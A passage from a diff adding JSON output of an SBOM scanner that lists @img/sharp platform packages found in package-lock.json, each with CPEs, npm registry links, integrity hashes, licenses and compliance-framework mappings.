"cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-linux-riscv64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_linux_riscv64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40img/sharp-linux-riscv64@0.34.5", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@img/sharp-linux-riscv64/-/sharp-linux-riscv64-0.34.5.tgz", + "integrity": "sha512-51gJuLPTKa7piYPaVs8GmByo7/U7/7TZOq+cnXJIHZKavIRHAP77e3N2HEl3dgiqdD/w0yUfiJnII77PuDDFdw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "95b5e1930a0a90db", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @img/sharp-linux-s390x 0.34.5", + "title": "@img/sharp-linux-s390x 0.34.5", + "description": "Package discovered: @img/sharp-linux-s390x 0.34.5", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "cdcec5be4d61926b", + "name": "@img/sharp-linux-s390x", + "version": "0.34.5", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-linux-s390x:\\@img\\/sharp-linux-s390x:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-linux-s390x:\\@img\\/sharp_linux_s390x:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_linux_s390x:\\@img\\/sharp-linux-s390x:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_linux_s390x:\\@img\\/sharp_linux_s390x:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-linux:\\@img\\/sharp-linux-s390x:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-linux:\\@img\\/sharp_linux_s390x:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_linux:\\@img\\/sharp-linux-s390x:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_linux:\\@img\\/sharp_linux_s390x:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-linux-s390x:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_linux_s390x:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40img/sharp-linux-s390x@0.34.5", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@img/sharp-linux-s390x/-/sharp-linux-s390x-0.34.5.tgz", + "integrity": "sha512-nQtCk0PdKfho3eC5MrbQoigJ2gd1CgddUMkabUj+rBevs8tZ2cULOx46E7oyX+04WGfABgIwmMC0VqieTiR4jg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "ba4a76a3169a3261", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @img/sharp-linux-x64 0.34.5", + "title": "@img/sharp-linux-x64 0.34.5", + "description": "Package discovered: @img/sharp-linux-x64 0.34.5", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "8ea3a106d5c8d10b", + "name": "@img/sharp-linux-x64", + "version": "0.34.5", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-linux-x64:\\@img\\/sharp-linux-x64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-linux-x64:\\@img\\/sharp_linux_x64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_linux_x64:\\@img\\/sharp-linux-x64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_linux_x64:\\@img\\/sharp_linux_x64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-linux:\\@img\\/sharp-linux-x64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-linux:\\@img\\/sharp_linux_x64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_linux:\\@img\\/sharp-linux-x64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_linux:\\@img\\/sharp_linux_x64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-linux-x64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_linux_x64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40img/sharp-linux-x64@0.34.5", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@img/sharp-linux-x64/-/sharp-linux-x64-0.34.5.tgz", + "integrity": "sha512-MEzd8HPKxVxVenwAa+JRPwEC7QFjoPWuS5NZnBt6B3pu7EG2Ge0id1oLHZpPJdn3OQK+BQDiw9zStiHBTJQQQQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "357195decb462ec7", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @img/sharp-linuxmusl-arm64 0.34.5", + "title": "@img/sharp-linuxmusl-arm64 0.34.5", + "description": "Package discovered: @img/sharp-linuxmusl-arm64 0.34.5", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "c5d74af075cbec8c", + "name": "@img/sharp-linuxmusl-arm64", + "version": "0.34.5", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-linuxmusl-arm64:\\@img\\/sharp-linuxmusl-arm64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-linuxmusl-arm64:\\@img\\/sharp_linuxmusl_arm64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_linuxmusl_arm64:\\@img\\/sharp-linuxmusl-arm64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_linuxmusl_arm64:\\@img\\/sharp_linuxmusl_arm64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-linuxmusl:\\@img\\/sharp-linuxmusl-arm64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-linuxmusl:\\@img\\/sharp_linuxmusl_arm64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_linuxmusl:\\@img\\/sharp-linuxmusl-arm64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_linuxmusl:\\@img\\/sharp_linuxmusl_arm64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-linuxmusl-arm64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_linuxmusl_arm64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40img/sharp-linuxmusl-arm64@0.34.5", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@img/sharp-linuxmusl-arm64/-/sharp-linuxmusl-arm64-0.34.5.tgz", + "integrity": "sha512-fprJR6GtRsMt6Kyfq44IsChVZeGN97gTD331weR1ex1c1rypDEABN6Tm2xa1wE6lYb5DdEnk03NZPqA7Id21yg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "5332b892777fe61c", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @img/sharp-linuxmusl-x64 0.34.5", + "title": "@img/sharp-linuxmusl-x64 0.34.5", + "description": "Package discovered: @img/sharp-linuxmusl-x64 0.34.5", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "26c07c454ffe91ee", + "name": "@img/sharp-linuxmusl-x64", + "version": "0.34.5", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-linuxmusl-x64:\\@img\\/sharp-linuxmusl-x64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-linuxmusl-x64:\\@img\\/sharp_linuxmusl_x64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_linuxmusl_x64:\\@img\\/sharp-linuxmusl-x64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_linuxmusl_x64:\\@img\\/sharp_linuxmusl_x64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-linuxmusl:\\@img\\/sharp-linuxmusl-x64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-linuxmusl:\\@img\\/sharp_linuxmusl_x64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_linuxmusl:\\@img\\/sharp-linuxmusl-x64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_linuxmusl:\\@img\\/sharp_linuxmusl_x64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-linuxmusl-x64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_linuxmusl_x64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40img/sharp-linuxmusl-x64@0.34.5", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@img/sharp-linuxmusl-x64/-/sharp-linuxmusl-x64-0.34.5.tgz", + "integrity": "sha512-Jg8wNT1MUzIvhBFxViqrEhWDGzqymo3sV7z7ZsaWbZNDLXRJZoRGrjulp60YYtV4wfY8VIKcWidjojlLcWrd8Q==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "34c9f7634c9fe393", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @img/sharp-wasm32 0.34.5", + "title": "@img/sharp-wasm32 0.34.5", + "description": "Package discovered: @img/sharp-wasm32 0.34.5", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "ef4974ec29f2dcac", + "name": "@img/sharp-wasm32", + "version": "0.34.5", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0 AND LGPL-3.0-or-later AND MIT", + "spdxExpression": "Apache-2.0 AND LGPL-3.0-or-later AND MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-wasm32:\\@img\\/sharp-wasm32:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-wasm32:\\@img\\/sharp_wasm32:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_wasm32:\\@img\\/sharp-wasm32:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_wasm32:\\@img\\/sharp_wasm32:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-wasm32:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_wasm32:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40img/sharp-wasm32@0.34.5", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@img/sharp-wasm32/-/sharp-wasm32-0.34.5.tgz", + "integrity": "sha512-OdWTEiVkY2PHwqkbBI8frFxQQFekHaSSkUIJkwzclWZe64O1X4UlUjqqqLaPbUpMOQk6FBu/HtlGXNblIs0huw==", + "dependencies": { + "@emnapi/runtime": "^1.7.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "866d76b99aec49d7", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @img/sharp-win32-arm64 0.34.5", + "title": "@img/sharp-win32-arm64 0.34.5", + "description": "Package discovered: @img/sharp-win32-arm64 0.34.5", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "b108eb8ed0a59806", + "name": "@img/sharp-win32-arm64", + "version": "0.34.5", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0 AND LGPL-3.0-or-later", + "spdxExpression": "Apache-2.0 AND LGPL-3.0-or-later", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-win32-arm64:\\@img\\/sharp-win32-arm64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-win32-arm64:\\@img\\/sharp_win32_arm64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_win32_arm64:\\@img\\/sharp-win32-arm64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_win32_arm64:\\@img\\/sharp_win32_arm64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-win32:\\@img\\/sharp-win32-arm64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp-win32:\\@img\\/sharp_win32_arm64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_win32:\\@img\\/sharp-win32-arm64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp_win32:\\@img\\/sharp_win32_arm64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-win32-arm64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_win32_arm64:0.34.5:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40img/sharp-win32-arm64@0.34.5", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@img/sharp-win32-arm64/-/sharp-win32-arm64-0.34.5.tgz", + "integrity": "sha512-WQ3AgWCWYSb2yt+IG8mnC6Jdk9Whs7O0gxphblsLvdhSpSTtmu69ZG1Gkb6NuvxsNACwiPV6cNSZNzt0KPsw7g==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated 